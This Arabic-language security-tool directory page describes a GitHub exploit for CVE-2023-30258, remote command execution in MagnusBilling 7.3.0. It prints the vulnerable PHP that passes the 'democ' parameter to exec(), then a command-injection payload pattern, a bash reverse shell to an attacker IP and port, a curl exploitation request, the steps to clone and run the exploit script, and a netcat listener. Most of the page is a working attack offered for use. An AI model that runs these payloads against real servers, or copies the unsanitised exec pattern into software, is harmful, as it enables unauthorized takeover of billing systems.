Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

استغلال لـ CVE-2023-30258: تنفيذ أوامر عن بُعد في MagnusBilling 7.3.0 عبر معلمة 'democ' غير المعقمة في icepay.php، مما يتيح حقن الأوامر وقشرة عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد
مشاركة

magnus_billing_7.3.0_RCE_CVE-2023-30258

توجد ثغرة تنفيذ أوامر عن بُعد في magnus billing 7.3.0، في المعامل "democ" من المورد "icepay.php"، حيث يمكنك تجاوز الاستعلام وتنفيذ الأمر الذي تريده.

الكود المعرض للثغرة

root@kitploit:~
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

يتم تمرير المعامل "democ" إلى exec() لإنشاء ملف جديد، ولكن كما ترى لا يوجد أي تعقيم للنصوص، ويمكن للمهاجم بسهولة تجاوز أمر touch وتنفيذ أمر أو حتى الحصول على قشرة عكسية. لتجاوز امتداد txt، يمكننا فقط إضافة ";" أخرى في نهاية السلسلة. ستبدو الحمولة النهائية هكذا:

root@kitploit:~
testfile;<command>;testfile

وهكذا سيبدو عند تمريره إلى دالة exec():

root@kitploit:~
exec('touch testfile;<command>;testfile.txt');

مثال على قشرة عكسية:

root@kitploit:~
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')

الاستغلال >:D

يمكننا استخدام curl للحصول على قشرة عكسية، مثال:

root@kitploit:~
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile

أو إذا كنت تفضل، يمكنك استخدام سكربت بايثون من هذا المستودع. التثبيت:

root@kitploit:~
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # change directory

chmod +x ./magnusbilling_rce.py                                             # add execution permissions to the python script

الاستخدام:

root@kitploit:~
./magnusbilling_rce.py -h                                                   # show help

./magnusbilling_rce.py -lh <attacker_ip> -lp <local_port> -u http://<ip/domain>:<port>/

وأخيرًا وليس آخرًا، تذكر أن تبدأ مستمعًا (listener) باستخدام netcat:

root@kitploit:~
nc -nlvvp <local_port>
تنزيل الأداة